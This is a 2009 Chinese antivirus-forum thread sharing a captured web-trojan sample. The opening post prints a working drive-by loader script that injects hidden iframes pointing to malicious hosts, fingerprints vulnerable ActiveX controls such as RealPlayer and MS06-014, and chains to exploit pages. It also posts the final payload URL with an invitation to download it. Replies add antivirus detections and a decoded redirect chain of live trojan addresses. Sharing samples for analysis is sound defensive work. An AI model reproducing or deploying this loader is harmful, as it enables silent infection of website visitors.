一个有意思的挂马代码

显示全部楼层 · 发表于 2009-3-28 12:25:01

http://3b3.org/c.js

var s,siteUrl,tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location+"";
siteUrl=s.substring(7,s.indexOf('/',7));
tmpdomain = 0;
for(var i=0;i<arydomain.length; i++)
{
if(siteUrl.indexOf(arydomain) > -1){
tmpdomain = 1;
break;
}
}
if(tmpdomain == 0){
document.writeln("<iframe src=http://www.rrr328.cn/llsg/45.htm width=0 height=0></iframe>");
function rl()
{
  var msgObj = document.createElement("div");
  msgObj.setAttribute("id","msgDiv");
  document.body.appendChild(msgObj);
  var obj = document.getElementById("msgDiv");
  obj.innerHTML ="<iframe src=http://www.rrr328.cn/llsg/45.htm width=0 height=0></iframe>";
}
  setInterval("rl()",10000);
}
document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.cn.yahoo.com\/908507\/ystat.js\"><\/script>");

不是政府和教育站就挂
document.writeln("<iframe src=http://www.rrr328.cn/llsg/45.htm width=0 height=0></iframe>");

<br>
<br>
<br>
<iframe src=http://www.n4no014.cn/a180/fxx.htm width=100 height=0></Iframe>
<br>
<br>
<br>
<br>
<br>
<br>
<br>

<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/955782/ystet.js"></script>
<br>

<Script>
document.write("<Iframe width=100 height=0 src=fx.htm></iframe>");
var sdvsddfcv="lpc";
document.write("<Iframe width=100 height=0 src=../a1/ss.htm></iframe>");
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1){
var dxkxss="ds";
document.write("<Iframe width=100 height=0 src=../a1/MS06014.htm></iframe>");}
try{var m;
var hw=new ActiveXObject("\x44"+"\x6f"+"\x77"+"\x6e"+"\x6c\x6f\x61\x64\x65\x72\x2e"+"\x44\x4c\x6f\x61\x64\x65\x72\x2e\x31");}
catch(m){};
finally{if(m!="[\x6f\x62\x6a\x65\x63\x74 \x45\x72\x72\x6f\x72]"){document.write("<Iframe width=100 height=0 src=../a1/sina.htm></iframe>");}}
try{var n;var qxxxxx="xac";var qxaaxx="aaaac";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};
finally{if(n!="[object Error]"){document.write("Downloader.DLoader.1");var cqqqqd="s";
document.write("<Iframe Width=100 height=0 src=../a1/no.htm></iframe>");}}var ddddddddd="dddddddddds";
try{var b;
var ml=new ActiveXObject("MPS.StormPlayer");}
catch(b){};
finally{if(b!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/bfyy.htm></iframe>");}}var sddbd="x";var sddqd="x";
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};
finally{var dxl="x";if(f!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/GLWORLD.html></iframe>");}}var pqxl="d";
function test()
{
var kkk="d";
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
var llooiiuuyy="f";
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32"){var ammc="dsvb";
document.write('<Iframe style=display:none src="../a1/real.htm"></iframe>');}
else
document.write('<iframe style=display:none src="../a1/real.hTml"></iframe>');
}
test();
document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";abc="dfdae";document.write("");var fkav="BS";var fkasaccv="BS";var fkaqfccv="BS";var fkfdccv="BS";var qsxxlv="BS";
</script>

最后地址http://d.mxxio.com:88/new/a1.css
大家自己下，呵呵

显示全部楼层 · 发表于 2009-3-28 12:31:23

Name: Rootkit.Biosavp.Gen
Type: Mutant

Description:

Files:
c:\users\administrator\desktop\a1.css

显示全部楼层 · 发表于 2009-3-28 12:32:37

那个a1.css让我想起了前段时间的牛犇、、、

和猫癣。

显示全部楼层 · 发表于 2009-3-28 12:33:06

被360拦截恶意（病毒）网站了

显示全部楼层 · 发表于 2009-3-28 12:34:12

显示全部楼层 · 发表于 2009-3-28 12:36:34

2楼

2009-3-28 12:36:16 已删除: Trojan-Downloader.Win32.Agent.bpfv C:\Documents and Settings\Administrator\桌面\新建文件夹\a1.rar/a1.css

显示全部楼层 · 发表于 2009-3-28 12:40:31

关于:hxxp://3b3.org/c.js解密的日志(全体输出 -  38):

Level  0>http://3b3.org/c.js
Level  1>http://www.rrr328.cn/llsg/45.htm
Level  2>http://www.n4no014.cn/a180/fxx.htm
Level  3>http://www.n4no014.cn/a1/real.html
Level  4>http://www.n4no014.cn/a1/realdadong.js
Level  5>http://d.mxxio.com:88/new/a1.css  ●
Level  3>http://www.n4no014.cn/a1/real.htm
Level  4>http://www.n4no014.cn/a1/mybrreal.js
Level  5>http://d.mxxio.com:88/new/a1.css  ●
Level  3>http://www.n4no014.cn/a1/glworld.html
Level  4>http://www.n4no014.cn/a1/hohogl.js
Level  5>http://d.mxxio.com:88/new/a1.css  ●
Level  3>http://www.n4no014.cn/a1/bfyy.htm
Level  3>http://www.n4no014.cn/a1/no.htm
Level  4>http://www.n4no014.cn/a1/sinawobushimybr.js
Level  5>http://d.weixk.com/new/a1.css  ●
Level  3>http://www.n4no014.cn/a1/sina.htm
Level  4>http://www.n4no014.cn/a1/sina.js
Level  4>http://d.opqxn.com/new/a2.css  ●
Level  3>http://www.n4no014.cn/a1/ms06014.htm
Level  4>http://www.n4no014.cn/a1/06014.js
Level  5>http://d.mxxio.com:88/new/a1.css  ●
Level  3>http://www.n4no014.cn/a1/ss.htm
Level  4>http://www.n4no014.cn/a1/xmybrx.js
Level  5>http://d.mxxio.com:88/new/a1.css  ●
Level  3>http://www.n4no014.cn/a180/fx.htm
Level  4>http://www.n4no014.cn/a180/flink.html
Level  5>http://www.n4no014.cn/a180/f16.swf  ●
Level  6>http://d.mxxio.com:88/new/a180.css  ●
Level  5>http://www.n4no014.cn/a180/f28.swf  ●
Level  5>http://www.n4no014.cn/a180/f45.swf  ●
Level  5>http://www.n4no014.cn/a180/f47.swf  ●
Level  5>http://www.n4no014.cn/a180/f64.swf  ●
Level  5>http://www.n4no014.cn/a180/f115.swf  ●
Level  4>http://www.n4no014.cn/a180/ilink.html
Level  5>http://www.n4no014.cn/a180/i28.swf  ●
Level  5>http://www.n4no014.cn/a180/i16.swf  ●
Level  5>http://www.n4no014.cn/a180/i45.swf  ●

Log by aarwwefdds(打点的均为真实木马地址,swf除外)

显示全部楼层 · 发表于 2009-3-28 12:43:42

卡巴 The requested URL http://bbs.kafan.cn/attachment.p ... 24&t=1238215330 is infected with Trojan-Downloader.Win32.Agent.bpfv virus

显示全部楼层 · 发表于 2009-3-28 12:44:12

又是一个REAL的

显示全部楼层 · 发表于 2009-3-28 16:38:18

估计就是牛犇、、、和猫癣。吧
不知道怎么都用CSS后缀是什么原因呢？

[ 本帖最后由 dayang1717 于 2009-3-28 16:43 编辑 ]

[病毒样本] 一个有意思的挂马代码

本帖子中包含更多资源

本帖子中包含更多资源